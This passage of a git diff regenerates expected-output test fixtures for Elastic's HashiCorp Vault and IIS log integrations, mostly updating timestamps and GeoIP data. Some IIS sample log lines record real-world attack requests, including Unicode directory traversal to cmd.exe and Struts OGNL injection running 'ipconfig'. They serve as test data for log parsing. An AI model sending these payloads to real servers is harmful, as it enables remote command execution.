d286bebd86234c474580cc2a74fdb79b16d936e4b8562e5cc13d82fbf7b\",\"cam_os_password\":\"hmac-sha256:b428f7bdeb97348f2553143030dfb1ac3b714436b59ed74e3320af2e13b5919f\",\"cam_os_username\":\"hmac-sha256:ff23e0d8782523b6a57c1bc1d21f88ef451359d7acefb032864e7a2715ba4185\",\"yale_lock_code_andrew\":\"hmac-sha256:545bca27b7805c8f17433693e8a07dab5c8b9d07a9a0e99ba04d73917c882956\",\"yale_lock_code_neva\":\"hmac-sha256:954080fe6c36dddfecea03fe20c91fa75d1c54488c1c706c988650dd0c45647e\",\"zwave_network_key\":\"hmac-sha256:382cc81146b9b71dc62135d6fb97246c74818857f3a73b03e7f7367ea53a8336\"},\"metadata\":{\"created_time\":\"hmac-sha256:be77f81a3338087479da238bf04ab23998c11375bc830cdeca8e30c24ab8a095\",\"deletion_time\":\"hmac-sha256:17a84bc5c1c7ee851af0069663ab9de3c879107724470fa34fc0b5418fb653db\",\"destroyed\":false,\"version\":6}}}}", "kind": "event", "action": "read", diff --git a/packages/hashicorp_vault/data_stream/audit/_dev/test/pipeline/test-faked-all-fields.log-expected.json b/packages/hashicorp_vault/data_stream/audit/_dev/test/pipeline/test-faked-all-fields.log-expected.json index 266b1cdf818..afdaa68d53f 100644 --- a/packages/hashicorp_vault/data_stream/audit/_dev/test/pipeline/test-faked-all-fields.log-expected.json +++ b/packages/hashicorp_vault/data_stream/audit/_dev/test/pipeline/test-faked-all-fields.log-expected.json 
@@ -48,7 +48,7 @@ "ip": "172.17.0.1" }, "event": { - "ingested": "2021-12-09T13:39:31.476462Z", + "ingested": "2021-12-14T14:46:43.994434636Z", "original": "{\"time\":\"2018-04-09T21:04:29.6406536Z\",\"type\":\"request\",\"auth\":{\"client_token\":\"hmac-sha256:eb3da855a3fb8b1c3574064f7edd080a97c4ebcf4a8e6674126710915fe464ae\",\"accessor\":\"hmac-sha256:f5a8798113bb65c0676abb3eef5ca5482c0c7daac38da36d402282a5414fcf3d\",\"display_name\":\"token\",\"policies\":[\"default\",\"sudo\",\"surf-admin\"],\"metadata\":{\"loglevel\":\"raw\",\"remote\":\"false\",\"surf\":\"moderate\"},\"entity_id\":\"\"},\"request\":{\"id\":\"b2f72168-6cba-1bab-808a-72d9304b82f8\",\"operation\":\"read\",\"client_token\":\"hmac-sha256:eb3da855a3fb8b1c3574064f7edd080a97c4ebcf4a8e6674126710915fe464ae\",\"client_token_accessor\":\"hmac-sha256:f5a8798113bb65c0676abb3eef5ca5482c0c7daac38da36d402282a5414fcf3d\",\"path\":\"auth/token/lookup-self\",\"data\":null,\"policy_override\":false,\"remote_address\":\"172.17.0.1\",\"wrap_ttl\":0,\"headers\":{}},\"error\":\"\"}", "kind": "event", "action": "read", 
@@ -143,7 +143,7 @@ "ip": "172.17.0.1" }, "event": { - "ingested": "2021-12-09T13:39:31.476471Z", + "ingested": "2021-12-14T14:46:43.994437407Z", "original": "{\"time\":\"2018-04-09T21:04:29.6420203Z\",\"type\":\"response\",\"auth\":{\"client_token\":\"hmac-sha256:eb3da855a3fb8b1c3574064f7edd080a97c4ebcf4a8e6674126710915fe464ae\",\"accessor\":\"hmac-sha256:f5a8798113bb65c0676abb3eef5ca5482c0c7daac38da36d402282a5414fcf3d\",\"display_name\":\"token\",\"policies\":[\"default\",\"sudo\",\"surf-admin\"],\"metadata\":{\"loglevel\":\"raw\",\"remote\":\"false\",\"surf\":\"moderate\"},\"entity_id\":\"\"},\"request\":{\"id\":\"b2f72168-6cba-1bab-808a-72d9304b82f8\",\"operation\":\"read\",\"client_token\":\"hmac-sha256:eb3da855a3fb8b1c3574064f7edd080a97c4ebcf4a8e6674126710915fe464ae\",\"client_token_accessor\":\"hmac-sha256:f5a8798113bb65c0676abb3eef5ca5482c0c7daac38da36d402282a5414fcf3d\",\"path\":\"auth/token/lookup-self\",\"data\":null,\"policy_override\":false,\"remote_address\":\"172.17.0.1\",\"wrap_ttl\":0,\"headers\":{}},\"response\":{\"data\":{\"accessor\":\"hmac-sha256:f5a8798113bb65c0676abb3eef5ca5482c0c7daac38da36d402282a5414fcf3d\",\"creation_time\":1523307682,\"creation_ttl\":180000000,\"display_name\":\"hmac-sha256:e38035c165f0076d9288ba0363eb36733379cc5d370bec5e82f11632519c26a8\",\"entity_id\":\"hmac-sha256:2fced7e2c77266f5079d733bea71dc8c8413d3838584ca9d0f4867271df7a220\",\"expire_time\":\"2023-12-23T05:01:22.8929692Z\",\"explicit_max_ttl\":0,\"id\":\"hmac-sha256:eb3da855a3fb8b1c3574064f7edd080a97c4ebcf4a8e6674126710915fe464ae\",\"issue_time\":\"2018-04-09T21:01:22.8929624Z\",\"meta\":{\"loglevel\":\"hmac-sha256:eac4a7deb2df94609ab14ae48b9edea81d91de51be1dd59df6ca6852537227c5\",\"remote\":\"hmac-sha256:aa2d1dd64d4468bbd9c6b0ca275cdffb7473a2d91b5f42a047161620245fcc79\",\"surf\":\"hmac-sha256:8b29af9294da23c72de8d8d847ccebd450d978af5565807d0c9922b6b2e92988\"},\"num_uses\":0,\"orphan\":false,\"path\":\"hmac-sha256:36ea987a227a2c7aefe055a98f99751383f601955e9f1925bd
3c2d6f9931a025\",\"policies\":[\"hmac-sha256:451623ebbe12fb9b1b3f444ceb5a5a46102452e46d640925c7b0dcb93a65a99a\",\"hmac-sha256:9a76c609b073848f2d9cb4a7fcddfc2103c0063480b87a9ee585e9e072e901d9\",\"hmac-sha256:8924f876eca967c68bbc8ac138e9f876f2144e300c08b1898224fc76902c1fe3\"],\"renewable\":true,\"ttl\":179999812}},\"error\":\"\"}", "kind": "event", "action": "read", @@ -233,7 +233,7 @@ "ip": "127.0.0.1" }, "event": { - "ingested": "2021-12-09T13:39:31.476476900Z", + "ingested": "2021-12-14T14:46:43.994437841Z", "original": "{\"time\":\"2021-07-21T12:37:50.93608Z\",\"type\":\"request\",\"auth\":{\"client_token\":\"hmac-sha256:3aae134b7843218bf089cd9b01a55ec417346a242b5383a7fac2ab49692f403a\",\"accessor\":\"bar\",\"display_name\":\"testtoken\",\"policies\":[\"root\"],\"token_policies\":[\"web\"],\"identity_policies\":[\"ident1\",\"ident2\"],\"external_namespace_policies\":{\"ns1\":[\"baz\"]},\"no_default_policy\":true,\"metadata\":{\"id\":\"007\"},\"remaining_uses\":5,\"entity_id\":\"foobarentity\",\"token_type\":\"service\",\"token_ttl\":14400,\"token_issue_time\":\"2020-05-28T13:40:18-05:00\"},\"request\":{\"id\":\"002c8225-e859-44a0-9ccb-471c3655dbd8\",\"operation\":\"update\",\"mount_type\":\"kv\",\"client_token\":\"hmac-sha256:e890f27c5ee11e26bda7c8e6ec218af451a6b1e35f9fe6d0676f1b29889b406c\",\"client_token_accessor\":\"35e2f256-0fc3-4eea-9405-3e212435b6c7\",\"namespace\":{\"id\":\"root\"},\"path\":\"secrets/foo\",\"data\":{\"data\":\"hmac-sha256:46c0fd3146d89ff602279417df7ac9267ce58fa3c6d2535d2d9050a5323c21ec\"},\"policy_override\":true,\"remote_address\":\"127.0.0.1\",\"wrap_ttl\":3600,\"headers\":{\"foo\":[\"bar\"]}},\"error\":\"this is an error\"}", "kind": "event", "action": "update", 
@@ -371,7 +371,7 @@ "ip": "127.0.0.1" }, "event": { - "ingested": "2021-12-09T13:39:31.476482600Z", + "ingested": "2021-12-14T14:46:43.994438242Z", "original": "{\"time\":\"2021-07-21T12:37:50.936443Z\",\"type\":\"response\",\"auth\":{\"client_token\":\"hmac-sha256:3aae134b7843218bf089cd9b01a55ec417346a242b5383a7fac2ab49692f403a\",\"accessor\":\"bar\",\"display_name\":\"testtoken\",\"policies\":[\"root\"],\"token_policies\":[\"web\"],\"identity_policies\":[\"ident1\",\"ident2\"],\"external_namespace_policies\":{\"ns1\":[\"baz\"]},\"no_default_policy\":true,\"metadata\":{\"id\":\"007\"},\"remaining_uses\":5,\"entity_id\":\"foobarentity\",\"token_type\":\"service\",\"token_ttl\":14400,\"token_issue_time\":\"2020-05-28T13:40:18-05:00\"},\"request\":{\"id\":\"002c8225-e859-44a0-9ccb-471c3655dbd8\",\"operation\":\"update\",\"mount_type\":\"kv\",\"client_token\":\"hmac-sha256:e890f27c5ee11e26bda7c8e6ec218af451a6b1e35f9fe6d0676f1b29889b406c\",\"client_token_accessor\":\"35e2f256-0fc3-4eea-9405-3e212435b6c7\",\"namespace\":{\"id\":\"root\"},\"path\":\"secrets/foo\",\"data\":{\"data\":\"hmac-sha256:46c0fd3146d89ff602279417df7ac9267ce58fa3c6d2535d2d9050a5323c21ec\"},\"policy_override\":true,\"remote_address\":\"127.0.0.1\",\"wrap_ttl\":3600,\"headers\":{\"foo\":[\"bar\"]}},\"response\":{\"auth\":{\"client_token\":\"hmac-sha256:3aae134b7843218bf089cd9b01a55ec417346a242b5383a7fac2ab49692f403a\",\"accessor\":\"bar\",\"display_name\":\"testtoken\",\"policies\":[\"root\"],\"token_policies\":[\"web\"],\"identity_policies\":[\"ident1\",\"ident2\"],\"external_namespace_policies\":{\"ns1\":[\"baz\"]},\"no_default_policy\":true,\"metadata\":{\"id\":\"007\"},\"entity_id\":\"foobarentity\",\"token_type\":\"service\",\"token_ttl\":14400,\"token_issue_time\":\"2020-05-28T13:40:18-05:00\"},\"mount_type\":\"kv\",\"data\":{\"certificate\":\"hmac-sha256:cb232c6394c9149b7f06f85e8ed9fcc55b7d1db82dd0ec1d321d0a83a7adda01\"},\"redirect\":\"redirect\",\"wrap_info\":{\"ttl\":3600,\"token\":\"hmac-sha
256:09dff0fdb8db56293383d7d0347afdf64ceb672cb9aea2c66edd802bcd714094\",\"accessor\":\"xzW2I9CMqcALsllhYvqtlsvq\",\"creation_time\":\"2020-05-28T18:40:18Z\",\"creation_path\":\"auth/token/create\",\"wrapped_accessor\":\"Bh57rT8zuhspG9APjXpGpiAJ\"},\"headers\":{\"Extra-Extra\":[\"read\"]}},\"error\":\"this is an error\"}", "kind": "event", "action": "update", diff --git a/packages/hashicorp_vault/data_stream/log/_dev/test/pipeline/test-log.log-expected.json b/packages/hashicorp_vault/data_stream/log/_dev/test/pipeline/test-log.log-expected.json index f7e698bf375..59165e5e2c5 100644 --- a/packages/hashicorp_vault/data_stream/log/_dev/test/pipeline/test-log.log-expected.json +++ b/packages/hashicorp_vault/data_stream/log/_dev/test/pipeline/test-log.log-expected.json @@ -16,7 +16,7 @@ "logger": "expiration" }, "event": { - "ingested": "2021-12-09T13:39:31.823398800Z", + "ingested": "2021-12-14T14:46:44.340880919Z", "kind": "event", "original": "{\"@level\":\"error\",\"@message\":\"failed to revoke lease\",\"@module\":\"expiration\",\"@timestamp\":\"2021-07-16T06:30:48.194192Z\",\"error\":\"failed to revoke entry: resp: (*logical.Response)(nil) err: RequestError: send request failed\\ncaused by: Post \\\"https://iam.amazonaws.com/\\\": dial tcp: lookup iam.amazonaws.com on 192.168.50.34:53: server misbehaving\",\"lease_id\":\"aws/creds/ddns-updater/oS5t84TSPRoYF2gX8McPyw4u\"}" }, @@ -40,7 +40,7 @@ "logger": "expiration" }, "event": { - "ingested": "2021-12-09T13:39:31.823409400Z", + "ingested": "2021-12-14T14:46:44.340883404Z", "kind": "event", "original": "{\"@level\":\"info\",\"@message\":\"revoked lease\",\"@module\":\"expiration\",\"@timestamp\":\"2021-07-16T06:33:08.867457Z\",\"lease_id\":\"auth/token/create/nomad-cluster/h15d750323d62439265743da0f02537e763b1968ba586b27770bd5262c9891a47\"}" }, 
@@ -68,7 +68,7 @@ "logger": "core.cluster-listener" }, "event": { - "ingested": "2021-12-09T13:39:31.823413700Z", + "ingested": "2021-12-14T14:46:44.340883903Z", "kind": "event", "original": "{\"@level\":\"info\",\"@message\":\"serving cluster requests\",\"@module\":\"core.cluster-listener\",\"@timestamp\":\"2021-07-09T17:20:27.184340Z\",\"cluster_listen_address\":{\"IP\":\"::\",\"Port\":8201,\"Zone\":\"\"}}" }, @@ -92,7 +92,7 @@ "logger": "storage.raft" }, "event": { - "ingested": "2021-12-09T13:39:31.823418500Z", + "ingested": "2021-12-14T14:46:44.340884290Z", "kind": "event", "original": "{\"@level\":\"info\",\"@message\":\"creating Raft\",\"@module\":\"storage.raft\",\"@timestamp\":\"2021-07-09T17:20:27.190451Z\",\"config\":\"\\u0026raft.Config{ProtocolVersion:3, HeartbeatTimeout:5000000000, ElectionTimeout:5000000000, CommitTimeout:50000000, MaxAppendEntries:64, BatchApplyCh:false, ShutdownOnRemove:true, TrailingLogs:0x2800, SnapshotInterval:120000000000, SnapshotThreshold:0x2000, LeaderLeaseTimeout:2500000000, LocalID:\\\"compute03-example-com\\\", NotifyCh:(chan\\u003c- bool)(0x4000324070), LogOutput:io.Writer(nil), LogLevel:\\\"DEBUG\\\", Logger:(*hclog.interceptLogger)(0x400057f2f0), NoSnapshotRestoreOnStart:true, skipStartup:false}\"}" }, @@ -120,7 +120,7 @@ "logger": "core.cluster-listener.tcp" }, "event": { - "ingested": "2021-12-09T13:39:31.823424400Z", + "ingested": "2021-12-14T14:46:44.340884654Z", "kind": "event", "original": "{\"@level\":\"info\",\"@message\":\"starting listener\",\"@module\":\"core.cluster-listener.tcp\",\"@timestamp\":\"2021-07-09T17:20:27.182327Z\",\"listener_address\":{\"IP\":\"0.0.0.0\",\"Port\":8201,\"Zone\":\"\"}}" }, 
@@ -145,7 +145,7 @@ "logger": "storage.raft" }, "event": { - "ingested": "2021-12-09T13:39:31.823430200Z", + "ingested": "2021-12-14T14:46:44.340885023Z", "kind": "event", "original": "{\"@level\":\"info\",\"@message\":\"initial configuration\",\"@module\":\"storage.raft\",\"@timestamp\":\"2021-07-09T17:20:27.212828Z\",\"index\":7788,\"servers\":\"[{Suffrage:Voter ID:compute03-example-com Address:192.168.50.36:8201} {Suffrage:Voter ID:compute02-example-com Address:192.168.50.35:8201} {Suffrage:Voter ID:compute01-example-com Address:192.168.50.34:8201}]\"}" }, @@ -170,7 +170,7 @@ "logger": "storage.raft" }, "event": { - "ingested": "2021-12-09T13:39:31.823434300Z", + "ingested": "2021-12-14T14:46:44.340885409Z", "kind": "event", "original": "{\"@level\":\"warn\",\"@message\":\"failed to contact\",\"@module\":\"storage.raft\",\"@timestamp\":\"2021-07-09T17:04:06.945541Z\",\"server-id\":\"compute03-example-com\",\"time\":4959141198}" }, @@ -194,7 +194,7 @@ "logger": "core.raft" }, "event": { - "ingested": "2021-12-09T13:39:31.823438400Z", + "ingested": "2021-12-14T14:46:44.340885785Z", "kind": "event", "original": "{\"@level\":\"info\",\"@message\":\"installed new raft TLS key\",\"@module\":\"core.raft\",\"@timestamp\":\"2021-07-16T19:05:02.795425Z\",\"term\":402}" }, @@ -219,7 +219,7 @@ "level": "info" }, "event": { - "ingested": "2021-12-09T13:39:31.823441900Z", + "ingested": "2021-12-14T14:46:44.340886155Z", "kind": "event", "original": "{\"@level\":\"info\",\"@message\":\"proxy environment\",\"@timestamp\":\"2021-07-09T17:01:42.203665Z\",\"http_proxy\":\"\",\"https_proxy\":\"\",\"no_proxy\":\"\"}" }, @@ -243,7 +243,7 @@ "logger": "audit" }, "event": { - "ingested": "2021-12-09T13:39:31.823446400Z", + "ingested": "2021-12-14T14:46:44.340886517Z", "kind": "event", "original": "{\"@level\":\"debug\",\"@message\":\"adding reload function\",\"@module\":\"audit\",\"@timestamp\":\"2021-07-22T17:33:20.689412Z\",\"path\":\"file/\"}" }, 
@@ -271,7 +271,7 @@ "logger": "audit" }, "event": { - "ingested": "2021-12-09T13:39:31.823452200Z", + "ingested": "2021-12-14T14:46:44.340886882Z", "kind": "event", "original": "{\"@level\":\"debug\",\"@message\":\"file backend options\",\"@module\":\"audit\",\"@timestamp\":\"2021-07-22T17:33:20.689526Z\",\"file_path\":\"/vault/logs/audit.json\",\"path\":\"file/\"}" }, @@ -296,7 +296,7 @@ "logger": "core" }, "event": { - "ingested": "2021-12-09T13:39:31.823458400Z", + "ingested": "2021-12-14T14:46:44.340887461Z", "kind": "event", "original": "{\"@level\":\"info\",\"@message\":\"enabled audit backend\",\"@module\":\"core\",\"@timestamp\":\"2021-07-22T17:33:20.691959Z\",\"path\":\"file/\",\"type\":\"file\"}" }, diff --git a/packages/hashicorp_vault/manifest.yml b/packages/hashicorp_vault/manifest.yml index e156af8d443..f0bcd7b0d17 100644 --- a/packages/hashicorp_vault/manifest.yml +++ b/packages/hashicorp_vault/manifest.yml @@ -1,7 +1,7 @@ format_version: 1.0.0 name: hashicorp_vault title: Hashicorp Vault -version: 1.2.1 +version: 1.2.2 license: basic description: Collect logs and metrics from Hashicorp Vault with Elastic Agent. type: integration diff --git a/packages/iis/changelog.yml b/packages/iis/changelog.yml index 3d9b232003e..6ad69ffba95 100644 --- a/packages/iis/changelog.yml +++ b/packages/iis/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "0.8.2" + changes: + - description: Regenerate test files using the new GeoIP database + type: bugfix + link: https://github.com/elastic/integrations/pull/2339 - version: "0.8.1" changes: - description: Change test public IPs to the supported subset diff --git a/packages/iis/data_stream/access/_dev/test/pipeline/test-iis-access-72.log-expected.json b/packages/iis/data_stream/access/_dev/test/pipeline/test-iis-access-72.log-expected.json index 85808183cd4..4d00d27202c 100644 --- a/packages/iis/data_stream/access/_dev/test/pipeline/test-iis-access-72.log-expected.json 
+++ b/packages/iis/data_stream/access/_dev/test/pipeline/test-iis-access-72.log-expected.json @@ -46,7 +46,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:39:33.179061100Z", + "ingested": "2021-12-14T14:46:45.758473813Z", "original": "2018-12-31 12:02:53 10.44.0.136 GET /pbserver/..À¯..À¯..À¯..À¯..À¯../winnt/system32/cmd.exe /c+dir+c:\\+/OG 8080 - 10.50.6.188 Mozilla/4.0+(compatible;+MSIE+8.0;+Windows+NT+5.1;+Trident/4.0) - 404 0 64 0", "kind": "event", "category": [ @@ -118,7 +118,7 @@ }, "event": { "duration": 46000000, - "ingested": "2021-12-09T13:39:33.179069800Z", + "ingested": "2021-12-14T14:46:45.758476211Z", "original": "2018-12-31 12:02:53 10.44.0.136 GET /pbserver/..ÁÁ..ÁÁ..ÁÁ..ÁÁ..ÁÁ../winnt/system32/cmd.exe /c+dir+c:\\+/OG 8080 - 10.50.6.188 Mozilla/4.0+(compatible;+MSIE+8.0;+Windows+NT+5.1;+Trident/4.0) - 404 0 2 46", "kind": "event", "category": [ @@ -188,7 +188,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:39:33.179075800Z", + "ingested": "2021-12-14T14:46:45.758476649Z", "original": "2018-12-31 12:02:53 10.44.0.136 GET /Director - 443 - 10.50.6.188 Mozilla/4.0+(compatible;+MSIE+8.0;+Windows+NT+5.1;+Trident/4.0) - 401 0 0 0", "kind": "event", "category": [ @@ -258,7 +258,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:39:33.179081600Z", + "ingested": "2021-12-14T14:46:45.758477019Z", "original": "2018-12-31 12:02:53 10.44.0.136 GET / - 443 - 10.50.6.188 Mozilla/4.0+(compatible;+MSIE+8.0;+Windows+NT+5.1;+Trident/4.0) - 401 0 0 0", "kind": "event", "category": [ @@ -330,7 +330,7 @@ }, "event": { "duration": 15000000, - "ingested": "2021-12-09T13:39:33.179087400Z", + "ingested": "2021-12-14T14:46:45.758477459Z", "original": "2018-12-31 12:02:53 10.44.0.136 GET /pbserver/..Áœ..Áœ..Áœ..Áœ..Áœ../winnt/system32/cmd.exe /c+dir+c:\\+/OG 8080 - 10.50.6.188 Mozilla/4.0+(compatible;+MSIE+8.0;+Windows+NT+5.1;+Trident/4.0) - 404 0 64 15", "kind": "event", "category": [ 
diff --git a/packages/iis/data_stream/access/_dev/test/pipeline/test-iis-access-75.log-expected.json b/packages/iis/data_stream/access/_dev/test/pipeline/test-iis-access-75.log-expected.json index 1a6cef5e3a7..2e2edcb66ca 100644 --- a/packages/iis/data_stream/access/_dev/test/pipeline/test-iis-access-75.log-expected.json +++ b/packages/iis/data_stream/access/_dev/test/pipeline/test-iis-access-75.log-expected.json @@ -44,7 +44,7 @@ }, "event": { "duration": 792000000, - "ingested": "2021-12-09T13:39:34.018260800Z", + "ingested": "2021-12-14T14:46:46.663915440Z", "original": "2018-08-28 18:24:25 [10.100.220.70](http://10.100.220.70) GET / - 80 - [10.100.118.31](http://10.100.118.31) Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+6.3;+WOW64;+Trident/7.0;+.NET4.0E;+.NET4.0C;+.NET+CLR+3.5.30729;+.NET+CLR[+2.0.50727](tel:+2050727);+.NET+CLR+3.0.30729) 404 4 2 792", "kind": "event", "category": [ @@ -114,7 +114,7 @@ }, "event": { "duration": 15000000, - "ingested": "2021-12-09T13:39:34.018269200Z", + "ingested": "2021-12-14T14:46:46.663932266Z", "original": "2019-03-06 18:43:17 10.0.140.107 GET /health-monitoring - 80 - 10.0.140.2 - 200 0 0 15", "kind": "event", "category": [ @@ -171,7 +171,7 @@ }, "event": { "duration": 15000000, - "ingested": "2021-12-09T13:39:34.018275Z", + "ingested": "2021-12-14T14:46:46.663932660Z", "original": "2019-03-06 18:43:17 10.0.140.107 GET /health-monitoring - 80 - 10.0.140.2 - 200 0 0 15", "kind": "event", "category": [ @@ -194,18 +194,12 @@ "source": { "geo": { "continent_name": "Europe", - "country_name": "Denmark", + "country_name": "Norway", "location": { "lon": 10.0, - "lat": 56.0 + "lat": 62.0 }, - "country_iso_code": "DK" - }, - "as": { - "number": 62121, - "organization": { - "name": "Christian Ebsen ApS" - } + "country_iso_code": "NO" }, "address": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" 
@@ -243,7 +237,7 @@ }, "event": { "duration": 15000000, - "ingested": "2021-12-09T13:39:34.018280500Z", + "ingested": "2021-12-14T14:46:46.663932997Z", "original": "2019-03-06 18:43:17 2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6 GET /health-monitoring - 80 - 2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6 - 200 0 0 15", "kind": "event", "category": [ diff --git a/packages/iis/data_stream/access/_dev/test/pipeline/test-iis-access.log-expected.json b/packages/iis/data_stream/access/_dev/test/pipeline/test-iis-access.log-expected.json index 66b85833c29..9ce001bd959 100644 --- a/packages/iis/data_stream/access/_dev/test/pipeline/test-iis-access.log-expected.json +++ b/packages/iis/data_stream/access/_dev/test/pipeline/test-iis-access.log-expected.json @@ -8,6 +8,18 @@ "ip": "127.0.0.1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "address": "67.43.156.13", "ip": "67.43.156.13" }, @@ -45,7 +57,7 @@ }, "event": { "duration": 123000000, - "ingested": "2021-12-09T13:39:34.416760400Z", + "ingested": "2021-12-14T14:46:47.087874836Z", "original": "2018-01-01 08:09:10 127.0.0.1 GET / q=100 80 - 67.43.156.13 Mozilla/5.0+(Windows+NT+6.1;+Win64;+x64;+rv:57.0)+Gecko/20100101+Firefox/57.0 - 200 0 0 123", "kind": "event", "category": [ @@ -121,7 +133,7 @@ }, "event": { "duration": 789000000, - "ingested": "2021-12-09T13:39:34.416769800Z", + "ingested": "2021-12-14T14:46:47.087877193Z", "original": "2018-01-01 09:10:11 W3SVC1 GET / - 80 - 127.0.0.1 Mozilla/5.0+(Windows+NT+6.1;+Win64;+x64;+rv:57.0)+Gecko/20100101+Firefox/57.0 - - example.com 200 0 0 123 456 789", "category": [ "web" 
@@ -152,6 +164,18 @@ "ip": "127.0.0.1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "address": "67.43.156.13", "ip": "67.43.156.13" }, @@ -198,7 +222,7 @@ }, "event": { "duration": 789000000, - "ingested": "2021-12-09T13:39:34.416775900Z", + "ingested": "2021-12-14T14:46:47.087877641Z", "original": "2018-01-01 10:11:12 W3SVC1 MACHINE-NAME 127.0.0.1 GET / - 80 - 67.43.156.13 HTTP/1.1 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_14_0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.102+Safari/537.36 - - example.com 200 0 0 123 456 789", "kind": "event", "category": [ @@ -269,7 +293,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:39:34.416781800Z", + "ingested": "2021-12-14T14:46:47.087877995Z", "original": "2018-12-31 12:52:33 10.44.0.136 GET / redirect:${%23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23webroot%3d%23req.getSession().getServletContext().getRealPath('/'),%23resp.println(%23webroot),%23resp.flush(),%23resp.close()} 443 - 10.50.6.188 Mozilla/4.0+(compatible;+MSIE+8.0;+Windows+NT+5.1;+Trident/4.0) - 401 0 0 0", "kind": "event", "category": [ @@ -338,7 +362,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:39:34.416787800Z", + "ingested": "2021-12-14T14:46:47.087878356Z", "original": "2018-12-31 12:52:33 10.44.0.136 GET /${#context['xwork.MethodAccessor.denyMethodExecution']=!(#_memberAccess['allowStaticMethodAccess']=true),(@java.lang.Runtime@getRuntime()).exec('ipconfig').waitFor()}.action - 443 - 10.50.6.188 Mozilla/4.0+(compatible;+MSIE+8.0;+Windows+NT+5.1;+Trident/4.0) - 404 0 2 0", "kind": "event", "category": [ diff --git a/packages/iis/data_stream/access/_dev/test/pipeline/test-ipv6zone.log-expected.json b/packages/iis/data_stream/access/_dev/test/pipeline/test-ipv6zone.log-expected.json index d4514daef9c..6e5865fd684 100644 
--- a/packages/iis/data_stream/access/_dev/test/pipeline/test-ipv6zone.log-expected.json +++ b/packages/iis/data_stream/access/_dev/test/pipeline/test-ipv6zone.log-expected.json @@ -55,7 +55,7 @@ }, "event": { "duration": 789000000, - "ingested": "2021-12-09T13:39:35.246884600Z", + "ingested": "2021-12-14T14:46:48.042607327Z", "original": "2018-01-01 10:11:12 W3SVC1 MACHINE-NAME ::1%0 GET / - 80 - ::1%0 HTTP/1.1 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_14_0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.102+Safari/537.36 - - example.com 200 0 0 123 456 789", "kind": "event", "category": [ diff --git a/packages/iis/data_stream/access/_dev/test/pipeline/test-x-forward-for-extended.log-expected.json b/packages/iis/data_stream/access/_dev/test/pipeline/test-x-forward-for-extended.log-expected.json index 0dc93bc622f..6202cfd086c 100644 --- a/packages/iis/data_stream/access/_dev/test/pipeline/test-x-forward-for-extended.log-expected.json +++ b/packages/iis/data_stream/access/_dev/test/pipeline/test-x-forward-for-extended.log-expected.json @@ -60,7 +60,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:39:35.443415300Z", + "ingested": "2021-12-14T14:46:48.252503682Z", "original": "2020-10-04 22:00:34 W3SVC2 freca1 10.24.129.162 GET /favicon.ico - 80 - 10.24.136.240 HTTP/1.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:81.0)+Gecko/20100101+Firefox/81.0 - https://images.hogeschoolrotterdam.nl/Blob/adeec119008c48758c1a6be53aeeb2ac/34ff475072d54117bcb46ea7f023bd87.jpg?width=1200\u0026height=630\u0026mode=crop images.hogeschoolrotterdam.nl 404 0 2 1437 534 0 67.43.156.14", "kind": "event", "category": [ 
@@ -145,7 +145,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:39:35.443423700Z", + "ingested": "2021-12-14T14:46:48.252506257Z", "original": "2020-10-05 21:40:30 W3SVC2 freca1 10.24.129.162 GET /robots.txt - 80 - 10.24.136.240 HTTP/1.1 Twitterbot/1.0 - - images.hogeschoolrotterdam.nl 200 0 0 346 306 0 67.43.156.14", "kind": "event", "category": [ @@ -228,7 +228,7 @@ }, "event": { "duration": 15000000, - "ingested": "2021-12-09T13:39:35.443429200Z", + "ingested": "2021-12-14T14:46:48.252506775Z", "original": "2020-10-05 21:48:33 W3SVC2 freca1 10.24.129.162 GET /app_data/cache/9/e/1/c/3/7/9e1c37a203a2a306e8f5d4df1bddb1109dd42e57.jpg width=35\u0026height=38\u0026mode=crop 80 - 10.24.136.240 HTTP/1.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.102+Safari/537.36+Edge/18.18362 BIGipServerYAkgvoMsadfHHYQAGkWEWnyAqAads=27246369425.20480.0000 https://www.rotterdamuas.com/ images.hogeschoolrotterdam.nl 200 0 0 2007 581 15 67.43.156.14", "kind": "event", "category": [ @@ -316,7 +316,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:39:35.443434600Z", + "ingested": "2021-12-14T14:46:48.252507180Z", "original": "2020-10-05 21:48:33 W3SVC2 freca1 10.24.129.162 GET /app_data/cache/f/b/7/1/2/7/fb71277260ae26a108c3608ce1a62474a55b2556.jpg width=75\u0026height=40\u0026mode=crop 80 - 10.24.136.240 HTTP/1.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.102+Safari/537.36+Edge/18.18362 BIGipServerYAkgvoMHHYQAGkWEWadfsadfnyAqAere=27246369425.20480.0000 https://www.rotterdamuas.com/ images.hogeschoolrotterdam.nl 200 0 0 2926 581 0 67.43.156.14", "kind": "event", "category": [ 
